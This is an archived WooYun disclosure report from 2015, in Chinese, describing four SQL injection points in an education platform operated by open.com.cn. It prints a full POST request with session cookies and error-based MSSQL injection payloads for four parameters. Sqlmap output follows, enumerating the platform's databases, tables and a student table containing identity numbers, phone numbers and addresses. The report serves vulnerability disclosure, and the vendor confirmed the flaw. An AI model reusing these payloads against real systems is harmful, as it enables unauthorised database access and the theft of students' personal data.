当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132411

漏洞标题:奥鹏教育网络学习云平台多处SQL注入(POST)

相关厂商:open.com.cn

漏洞作者: 路人甲

提交时间:2015-08-07 17:00

修复时间:2015-09-21 17:36

公开时间:2015-09-21 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

刚才提交的说重复,请审核的管理员看看,这次提交的四处SQL注入点,是不是全部重复,如果都重复,我在提交新的注入点,这就是我孜孜不倦的精神。

详细说明:

话不多说。

漏洞证明:

奥鹏教育网络学习云平台4处SQL注入(POST)(不知这四处注入点是否和平台已有全部重复,麻烦审核人员了)
http://os.open.com.cn/
提交的POST数据如下:

POST /WebApi/edus/security/Teacher_GetDataGrid?token={%22UserID%22:%228371cea6-945a-43ca-b996-8ef53b0f0293%22,%22OrganizationID%22:%22038699a3-17dc-4d48-aa5a-7aaf681fe811%22,%22OrgType%22:3,%22OrgImage%22:null,%22ServiceOrgID%22:%2200000000-0000-0000-0000-000000000000%22,%22DataOrgID%22:%22038699a3-17dc-4d48-aa5a-7aaf681fe811%22} HTTP/1.1
Host: edus.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 78
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://edus.open.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://edus.open.com.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: b_t_s=t238655849967x; b_t_s_100200=f58fcd5f-b60f-4646-b9e8-ae20323d7df1; up_first_date=2015-08-04; up_beacon_id_100200=f58fcd5f-b60f-4646-b9e8-ae20323d7df1-1438655850891; b_t_s_100100=f77a5bfa-976f-4a62-9f1e-51c6079b2873; up_beacon_id_100100=f77a5bfa-976f-4a62-9f1e-51c6079b2873-1438656292175; __CT_Data=gpv=4&apv_52710_www=4; WRUID=0; b_t_s_100201=624ff061-3c08-4864-91aa-1c9b54986608; up_beacon_id_100201=624ff061-3c08-4864-91aa-1c9b54986608-1438656384677; b_t_s_100102=61155c61-46b2-457a-8d26-532dd1d1d259; up_beacon_user_id_100201=eduadmin; up_page_stime_100201=1438827948471; up_beacon_vist_count_100201=21; up_page_stime_100103=1438842467811; up_beacon_vist_count_100103=1; b_t_s_100103=8e366208-e9ed-473c-89e8-a0a3918f7afa; up_beacon_id_100103=8e366208-e9ed-473c-89e8-a0a3918f7afa-1438842467819; up_page_stime_100200=1438852497632; up_beacon_vist_count_100200=6; __utma=238318431.811077368.1438657123.1438825517.1438852500.3; __utmc=238318431; __utmz=238318431.1438852500.3.3.utmcsr=bj.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/; Hm_lvt_e208d74b7fc93539fb0706a17abb4f67=1438852508; Hm_lpvt_e208d74b7fc93539fb0706a17abb4f67=1438852508; up_page_stime_100100=1438852507842; up_beacon_vist_count_100100=5; up_page_stime_100202=1438911384462; up_beacon_vist_count_100202=1; b_t_s_100202=63922bf9-d1fe-4e6b-80f4-cb6b39bf618f; up_beacon_id_100202=63922bf9-d1fe-4e6b-80f4-cb6b39bf618f-1438911384468; ASP.NET_SessionId=ujy2dp2fbe2iuumdqfaf2xdm; sidebar_closed=0
realName=11111&userName=22222&titleCode=&educationCode=&status=&page=1&rows=10


注入点1(realName):

Place: POST
Parameter: realName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: realName=11111%' AND 6389=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6389=6389) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(97)+CHAR(113))) AND '%'='&userName=22222&titleCode=&educationCode=&status=&page=1&rows=10


注入点2(titleCode):

Place: POST
Parameter: titleCode
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: realName=11111&userName=22222&titleCode=' AND 7705=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (7705=7705) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(97)+CHAR(113))) AND 'Apqk'='Apqk&educationCode=&status=&page=1&rows=10


注入点3(educationCode):

Place: POST
Parameter: educationCode
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: realName=11111&userName=22222&titleCode=&educationCode=' AND 1803=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1803=1803) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(97)+CHAR(113))) AND 'heWd'='heWd&status=&page=1&rows=10


注入点4(userName):

Place: POST
Parameter: userName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: realName=11111&userName=22222' AND 3485=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3485=3485) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(97)+CHAR(113))) AND 'wlFR'='wlFR&titleCode=&educationCode=&status=&page=1&rows=10


使用SQLMAP测试,结果包含7个数据库:
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] DBExchange
[*] master
[*] model
[*] msdb
[*] Open2u
[*] Open2U_Publish
[*] tempdb
当前数据库为Open2U_Publish:

31.png


Open2U_Publish数据库包含76个表:
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: Open2U_Publish
[76 tables]
+-------------------------------+
| Base_AdmissionsCategory |
| Base_Course |
| Base_CourseCategory |
| Base_CourseTeacher |
| Base_EducationalLevel |
| Base_ForeignLanguage |
| Base_Level |
| Base_OccupationalGroup |
| Base_StudyLength |
| Base_StudyWay |
| Base_Subject |
| Dic_CertificateType |
| Dic_Education |
| Dic_Nation |
| Dic_OrganizationType |
| Dic_Political |
| Dic_Subject |
| Dic_Title |
| Dic_UserType |
| EDU_StudyProgress |
| Edu_Announcement |
| Edu_AnnouncementLog |
| Edu_Batch |
| Edu_ChooseCourseWay |
| Edu_Class |
| Edu_CourseBulletin |
| Edu_DegreeBatch |
| Edu_DesgreeEnglish |
| Edu_DesgressApply |
| Edu_ExemptLearn |
| Edu_GraduateApply |
| Edu_GraduateInfo |
| Edu_GraduationBatch |
| Edu_ImportTask |
| Edu_SchoolRollChange |
| Edu_Semester |
| Edu_SignUp |
| Edu_SignUpBatch |
| Edu_StudentActive |
| Edu_StudentCourse |
| Edu_StudentCourseChangeBak |
| Edu_StudentEnrolment |
| Edu_StudentUpdateLog |
| Edu_TeachPlan |
| Edu_TeachPlanCourse |
| Exam_Batch |
| Exam_StudentGrade |
| Organization |
| Organization_Area |
| Organization_Relation |
| Organization_Station |
| Organization_University |
| Security_Function |
| Security_Manager |
| Security_Module |
| Security_OrganizationFunction |
| Security_Role |
| Security_RoleFunction |
| Security_Student |
| Security_Teacher |
| Security_User |
| Security_UserRole |
| Study_CourseBrowse |
| Study_Favorites |
| Study_Praise |
| Study_QuestionAnswer |
| Study_QuestionAnswerLocation |
| Sys_ImportOrExport |
| Temp_RollRegister |
| Temp_StudentStation |
| View_QuestionAnswerInfo |
| View_StudentCourseInfo |
| View_StudentEnrolmentInfo |
| View_StudentUserInfo |
| View_TeacherCourseInfo |
| View_UserQuestionAnswerInfo |
+-------------------------------+
随便看了下Security_Student表:
Database: Open2U_Publish
Table: Security_Student
[19 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| Address | nvarchar |
| Birthday | datetime |
| CertificateNumber | nvarchar |
| CertificateTypeCode | nvarchar |
| Company | nvarchar |
| CreateTime | datetime |
| CreatorID | uniqueidentifier |
| Email | nvarchar |
| ID | uniqueidentifier |
| ModifierID | uniqueidentifier |
| ModifyTime | datetime |
| NationCode | nvarchar |
| PoliticalCode | nvarchar |
| PostCode | nvarchar |
| QQ | nvarchar |
| RealName | nvarchar |
| Sex | int |
| Status | int |
| Telephone | nvarchar |
+---------------------+------------------+
先提交再说,坐等审核。

修复方案:

你们说了算。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-08-07 17:35

厂商回复:

新上的项目,我们会联系研发进行处理

最新状态:

暂无

漏洞评价:

评论